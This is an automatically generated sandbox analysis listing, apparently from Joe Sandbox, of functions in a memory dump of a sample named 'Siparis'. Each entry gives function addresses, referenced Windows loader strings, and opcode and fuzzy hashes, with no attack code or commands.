Opcode Fuzzy Hash: 3682efddae08be3c260b26fa8f448bc195e39021baedd8c9c2f74f9f7a54227e
Instruction Fuzzy Hash: BF1106323181519FDB1DCA19D484BBAF7A4EF40A1DF54816EF406CF661DB30D881C750

Function 014420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01442104
Process initialization failed with status 0x%08lx, xrefs: 014420F3
LdrpInitializationFailure, xrefs: 014420FA

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: ba3531395b4338f5555d4f838b05d567f6fdc4fefd88ae78006ae595ac2386e8
Instruction ID: 29dde7ba9199eff2fff5c761c6051891f627726c389af3b1e58bb118b6fccfb7
Opcode Fuzzy Hash: ba3531395b4338f5555d4f838b05d567f6fdc4fefd88ae78006ae595ac2386e8
Instruction Fuzzy Hash: 32F0C8756403086BE724EA4EDC46F963B6CEB54B58F54005EFB007B3A1D1F0A940C691

Function 013D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01424D8A

Strings

#%u, xrefs: 01424D82

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 15b2343b725dd8f512af2b43ab15b112743b6e400cf2e2d22f851cbf9d18752f
Instruction ID: 3429d76d2d3c1447f82ba348bdef1198c1c55dcee63a9ac4d75f0cf2dd603477
Opcode Fuzzy Hash: 15b2343b725dd8f512af2b43ab15b112743b6e400cf2e2d22f851cbf9d18752f
Instruction Fuzzy Hash: 11716FB2A0010A9FDB05DFA9D980FAEB7F8FF18704F15406AE905E7261E674ED41CB61

Function 013CA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 013CAA13
LdrResSearchResource Exit, xrefs: 013CAA25

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: d62da9b6731d4c3027e4ca5f9061489805f3e9f81a50d52073347b951866af5e
Instruction ID: c478485801ded76c416cc20ca10ccec60780c5c78ace3e315e6d842982361f15
Opcode Fuzzy Hash: d62da9b6731d4c3027e4ca5f9061489805f3e9f81a50d52073347b951866af5e
Instruction Fuzzy Hash: 62E17371E0021D9BEF22CF9DC990BAEBBB9BF18718F14452AE901E7261E7749D41CB50

Function 0148A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0148A44B
`, xrefs: 0148A551

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: c3cc2e9c16eab81d199c2310f606a33474d3e9a932439520aa6b3212fb68c1c5
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 97C103312043429BEB25EF29C840B2FBBE5AFD4318F284A2FF695872A0D7B4D545CB51

Function 0143E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 0143E75A
UEFI, xrefs: 0143E751

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 1739107c802605da86d08c7c624905ad48dad33fcb24201c409d48bb00e3be68
Instruction ID: 9a06df00c1f96b93398d0cbefc184592edb69274fb4d5981ca6e9eacd6b77bea
Opcode Fuzzy Hash: 1739107c802605da86d08c7c624905ad48dad33fcb24201c409d48bb00e3be68
Instruction Fuzzy Hash: 26616C71E012099FDB19DFA9C940BAEBBB5FB88704F14402EE649FB2A1D731E901CB50

Function 014643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01464525
@, xrefs: 01464437

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: a02dfad9d515814d7e4d2b265dfe62c092192d76acd9ebd0784f7f675a682244
Instruction ID: bed4d0efd54cd16e5070649d6721e5b413a9ef3dc0e1570b0ab62c68be503212
Opcode Fuzzy Hash: a02dfad9d515814d7e4d2b265dfe62c092192d76acd9ebd0784f7f675a682244
Instruction Fuzzy Hash: A7510871E0021DAEDF11DFA9CC84EEFBBBCEB54758F14052AE611A72A0D6749E058B60

Function 013C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013C063D
kLsE, xrefs: 013C0540

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: e09661395ab2fc5aee0209d70087a4014b91bf65650bc64de60fe6e4d8dbeb5a
Instruction ID: d1d16cd25c8d6012e9004274292a7b3295c35eedb6649c40ebaf246fa6f0b65a
Opcode Fuzzy Hash: e09661395ab2fc5aee0209d70087a4014b91bf65650bc64de60fe6e4d8dbeb5a
Instruction Fuzzy Hash: DC51CF79504782CFD728EF78C5806A3BBE4EF84B18F10483EE6AA87241E7309945CF91

Function 013CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 013CA2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 013CA309

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: ae5175ae584bc9ce9fce5ab642a489152b70c9fd4462e50ec927713d227102e6
Instruction ID: 0fce55f1379df46652c9a5b972514e70b5a2e8e3e177697dbb3a089aac90706d
Opcode Fuzzy Hash: ae5175ae584bc9ce9fce5ab642a489152b70c9fd4462e50ec927713d227102e6
Instruction Fuzzy Hash: FB41B075A04659DBDB11CF6DC450B6A7BB4FF84B08F1440AAE900DB3A1E3B5DE40CB50

Function 013FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 013FA5E4
Threadpool!, xrefs: 013FA5E9

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 4c794cf0b732455e287d341c230b764324149b06a64f676fb75b43a908ba4aea
Instruction ID: ccfddab3637653d6a98ec8c43d6f299e87fe2da50b1aeac6871064c5a1621b40
Opcode Fuzzy Hash: 4c794cf0b732455e287d341c230b764324149b06a64f676fb75b43a908ba4aea
Instruction Fuzzy Hash: 0E01D1B2250704AFE312DF28CD45F1677E8E794729F01893EAA4CC7290E374D804CB46

Function 013CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 013CC8C3, 013CCA40

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: f1bd4f280864ed48c4ac16662a8c5193ad268ee6e4fe0be480a5dbf87dc72d10
Instruction ID: dbcfb62587d38ac31003d2f49395e7545b3567e288842493e7f83d0f700ae9fc
Opcode Fuzzy Hash: f1bd4f280864ed48c4ac16662a8c5193ad268ee6e4fe0be480a5dbf87dc72d10
Instruction Fuzzy Hash: B9825C75E002198BEB25CFADC880BEDBBB5BF48B18F14816DE959AB251DB309D41CF50

Function 01446420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 014465C1

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: eb78fb70228952a2a4b7ef660988da17f6f7425f194172f85889808b04450e71
Instruction ID: 8f80c92828f6888fe98f22915859bfdb9bc7ce97272d68dfb6a9d14493c95d1d
Opcode Fuzzy Hash: eb78fb70228952a2a4b7ef660988da17f6f7425f194172f85889808b04450e71
Instruction Fuzzy Hash: 87917372940219AFEB21DF99DC85FAE7BB8EF55754F110066F604AB2E0D774AD00CBA0

Function 0146E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 0146E1FA

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6af6fbe19f4eb4a71df66f2d604a803f6e1032d34476f979cb5f77c3b9339cd3
Instruction ID: d53ded82b98302438a2cb8a453c56ad2895a01d8c20dc1ffeb7542293087dcc6
Opcode Fuzzy Hash: 6af6fbe19f4eb4a71df66f2d604a803f6e1032d34476f979cb5f77c3b9339cd3
Instruction Fuzzy Hash: EB91A076900609AEDB22EF99DC44FEFBBBDEF55748F10002AF600A7260D7349946CB52

Function 013FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 014367C9

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 2d117f8087bd1ce16d2084eb1602db05312c2fcb2445fd0aa602b147cd0b503c
Instruction ID: 8e4003b679da76902fe5c14a0bf01539454bd508482272c7bca5ccc2480f9778
Opcode Fuzzy Hash: 2d117f8087bd1ce16d2084eb1602db05312c2fcb2445fd0aa602b147cd0b503c
Instruction Fuzzy Hash: FC718EB5E0120AAFDF29CF9CC5906AEBBB1BF8C714F15812EE505A7360E7718A41CB50

Function 01464978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01464A7F

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 8b6fee1678a82f4b085810548bfaff526e833d30e1907cd2469db21eb8bbbc98
Instruction ID: 35bd561ccd96397dc48dea0fba01bff52bba8620efd52133b56eb55349c808ad
Opcode Fuzzy Hash: 8b6fee1678a82f4b085810548bfaff526e833d30e1907cd2469db21eb8bbbc98
Instruction Fuzzy Hash: 5D518872D00226ABDF15DF99D840AAEBBB9FF14A18F09412BE911B7360D7349D01CBE5

Function 013DE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 013DE6A4

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 17897295d641293a569b3e2cf739d111be9a1be9f12c35dee9c855cc82cb674c
Instruction ID: c7d0aee7ae731fcece150f70f8dc559dfb8135be8c30a4056e0a82eccbb53049
Opcode Fuzzy Hash: 17897295d641293a569b3e2cf739d111be9a1be9f12c35dee9c855cc82cb674c
Instruction Fuzzy Hash: 2E4193B35083129BD711DA79E880B6BBBE8AF8871CF45093DF584DB180E674D904C793

Function 0143C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0143C77F

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: ed7515cf6032c005e96123fa40e2adf16c8539dc5028646b1ee768e5ebd7d630
Instruction ID: 7916a81a0837f9e84568dffa363670546b9efdb75c95382142205e6ba5a099c1
Opcode Fuzzy Hash: ed7515cf6032c005e96123fa40e2adf16c8539dc5028646b1ee768e5ebd7d630
Instruction Fuzzy Hash: 894122B1D0052DABDB21DA55CC84FDEB77CAB54714F0045ABEB08BB190DB709E898FA4

Function 01456B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01456B91

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: ceba372cce6cdfdc1d87ff3c77615f130261ec78980c453c000b47abdd038910
Instruction ID: ecc70cbed913ec36f7eedcbec2ae4a5e40a6d128f0ac640aeadc505253b06147
Opcode Fuzzy Hash: ceba372cce6cdfdc1d87ff3c77615f130261ec78980c453c000b47abdd038910
Instruction Fuzzy Hash: 86310531A007199BEB33DB6DC850BAEBBA8DF54704F95402AEE40AB3A3C775D805CB50

Function 0143CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0143CAA2

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 061bc2aa41efbd0fb7c271c5c8d9ce97766445238d6c498ddc1d53d5a17c0b4e
Instruction ID: ef6ef262c9ae750f087d90dcc745855a2b9a89ae6e31bc7b1d9abe31bb093ed3
Opcode Fuzzy Hash: 061bc2aa41efbd0fb7c271c5c8d9ce97766445238d6c498ddc1d53d5a17c0b4e
Instruction Fuzzy Hash: 3B310336900515AFEB1ADB59D885E6FBB74EBC8720F11412BE905B72A0D7309E05DBE0

Function 0144892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0144895E

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 63264ae5950d8c81a7e2f466738f2db92e5d77eb335a00017b060a5e5655ede8
Instruction ID: 604cfdc98646e91db356bb7213c637abc2f2df8ae42528e868f6cdbb9b72fdda
Opcode Fuzzy Hash: 63264ae5950d8c81a7e2f466738f2db92e5d77eb335a00017b060a5e5655ede8
Instruction Fuzzy Hash: AD012B35201A039FF6296F9ADCC4A57BF65EF95658B08042FF74116671CF306C41CBA2

Function 01462000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d6c1b287c7a4859000892865a93a5f7e7a5a0b7c4c27c63723c6f053f3d456f
Instruction ID: 614ba4df8f327e767ee00fd0d90003da0e5829b93bc7499078f8b8f5a4293fc3
Opcode Fuzzy Hash: 6d6c1b287c7a4859000892865a93a5f7e7a5a0b7c4c27c63723c6f053f3d456f
Instruction Fuzzy Hash: B042C571608341ABD725CF69C890E6BBBE9AF94308F08492FFA8597360D7B4D845CB53

Function 01458158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe10f9fbe649929f185ddde6328d99107317788abf7b82e4a4c60d566e9b3e1a
Instruction ID: 23d4ed48a298cfb2efe3f24be0c2ca2785a5752d0fc74cfdef3f8648461b8152
Opcode Fuzzy Hash: fe10f9fbe649929f185ddde6328d99107317788abf7b82e4a4c60d566e9b3e1a
Instruction Fuzzy Hash: 10425F75E0021A8FEB65CF69C841BAEBBF5BF44304F14809AE949EB352DB349985CF50

Function 013D2840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a58edfd411458f34d21f3035e4b5006bad61e117ceb8dbe39ba8025ce2df45d6
Instruction ID: eadd066a51b73d7beab395ced985027cca043a99847c160c7167ebcb0ab82e4e
Opcode Fuzzy Hash: a58edfd411458f34d21f3035e4b5006bad61e117ceb8dbe39ba8025ce2df45d6
Instruction Fuzzy Hash: D532F070A007658FDB25CF69C8447BEBBF2BF84304F55411ED88A9B3A4DB75A892CB50

Function 0146A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39558f4d606d3e3b4d09bcbe771a5650c2c3175ef633a4c0610066834fbc78a9
Instruction ID: 7d2a8b2abecef217a5c3f7c86c5440980a4e158b54b6eb42c144799f6d61dc8f
Opcode Fuzzy Hash: 39558f4d606d3e3b4d09bcbe771a5650c2c3175ef633a4c0610066834fbc78a9
Instruction Fuzzy Hash: 9B22E570204A618BE725CF2DC054373BBF9AF45309F28845BD9869F3A6D735E852CB62

Function 013C6A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5cb871e3fa3d89019e5730d7785aceed5af24276083fc3363ca09b3e6d70f96
Instruction ID: 47fba3438357da080addcef570558fa3a5e6ca16779df6534d5b109a5a28c219
Opcode Fuzzy Hash: f5cb871e3fa3d89019e5730d7785aceed5af24276083fc3363ca09b3e6d70f96
Instruction Fuzzy Hash: 51329DB1A04215CFDB25CF69C480BAABBF5FF48704F14856EE95AAB7A1D730AC41CB50

Function 013E4A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 78bbe5b94696206f469e4ce327753be6f1e51b7fc9e0e384358f6ddeaca25ce1
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 77F13B71E0032A9BDF15CF99C584BAEBBF5AF48718F04812AE945EB391E774E841CB50

Function 0145892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f99b208a9beb10dbda41261201f380dbc602797d3db3bf0cc6296d41e9cfde8b
Instruction ID: 7bff64ec15bb01ebd4cdcfa5205d89d8553de87ddb4eeba8058a5f506ee11e26
Opcode Fuzzy Hash: f99b208a9beb10dbda41261201f380dbc602797d3db3bf0cc6296d41e9cfde8b
Instruction Fuzzy Hash: B3D1F271E0060B8BDF46CF5AC841AFFB7F5AF88304F18816AD955A7252DB35E906CB60

Function 013C65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 496da8e1b7ce76e1b17bbe9425b4f1538af4c62d03047749c3a122ccbc39cca9
Instruction ID: 5470586dbee76a6015e77b437c93b487527c6b348db3b2fbba8c0a3efe7d041d
Opcode Fuzzy Hash: 496da8e1b7ce76e1b17bbe9425b4f1538af4c62d03047749c3a122ccbc39cca9
Instruction Fuzzy Hash: 40E18EB1508342CFC715CF28C490A6ABBE0FF89718F158A6DE99987351EB31ED45CB92

Function 013B8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13bea91e531e02a232a562ec11b51fe16b4726d22268f4ec9ac824ebe2e15cbf
Instruction ID: 278ec3c2f3ac2a28f67e1c185792753c1c4e9fb90dcc4dd9ba44a65f02d15e4a
Opcode Fuzzy Hash: 13bea91e531e02a232a562ec11b51fe16b4726d22268f4ec9ac824ebe2e15cbf
Instruction Fuzzy Hash: EAD1D071A0020A9BDB14DF29C8C1AFAB7B9EF6430CF04466EEA15DBA94F734D951CB50

Function 01448243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 1627d20a86991260d3b884417a3b1e7228711b2e7e60efc2c5c78dcfa880c45e
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 06B16474A006069FEF64DFD9C940EABBBB9FF94304F14446FAA42977A1DA34E905CB10

Function 013D0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 08a47c893c27bc1fc88cb86d64b8066f72cc68088e68b400baca6b27a8085649
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: B7B15772604646DFDB15CB68C850BBEBBFAEF84604F19015AE652DB391D730EE81CB50

Function 013C83C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 314feab0823a5b7b2564ab0de643becaedcc8ca995e9abde3655a91ca2afb0ea
Instruction ID: 43d12452b4c722c9c1836b4e9c59c0dff4aadd3ecf9a07c8612a74a65917c817
Opcode Fuzzy Hash: 314feab0823a5b7b2564ab0de643becaedcc8ca995e9abde3655a91ca2afb0ea
Instruction Fuzzy Hash: 89C14774108341CFD764CF19C484BABB7E4BF98708F44496EE989873A1D7B5EA44CB92

Function 013BC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14f85d427af536fd24c7fc150f1275dcc7632aad958bd7339bbf6a414e5249ca
Instruction ID: 2b4d85e220ca904df3a0bffea259567a7dff4d33b4fd108507b011443a7e1fbb
Opcode Fuzzy Hash: 14f85d427af536fd24c7fc150f1275dcc7632aad958bd7339bbf6a414e5249ca
Instruction Fuzzy Hash: 62B19370B002698BDB35CF59C890BE9B7B5EF44704F1485EAD64AE7691EB30DE85CB20

Function 013EE5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfd65654316d96e837bac5c76bbf59de47b0b30ef35f3f43bef5996b83dd504d
Instruction ID: 2836135193a48f27c2b4845c2b7c58631eaaec0d4f6fe38de90ec394de4db273
Opcode Fuzzy Hash: bfd65654316d96e837bac5c76bbf59de47b0b30ef35f3f43bef5996b83dd504d
Instruction Fuzzy Hash: 95A1F571E007399FEB21DB59C848BAEBBF4BB04718F450166EA00AB2E1D7749D84CB91

Function 01400185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039315a93ad0cc9216bc3fccd909f26d1a3af3b7fec12950719837639436109c
Instruction ID: c09964b17fcfe0c0c5fac481ef8029278f62fdd4f50f081a152e2bb6063a716f
Opcode Fuzzy Hash: 039315a93ad0cc9216bc3fccd909f26d1a3af3b7fec12950719837639436109c
Instruction Fuzzy Hash: 2CA1D171B016169BDB26DF6AC590BAAB7A1FF94354F00403AEA05973E2DB74E816CB40

Function 01494500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

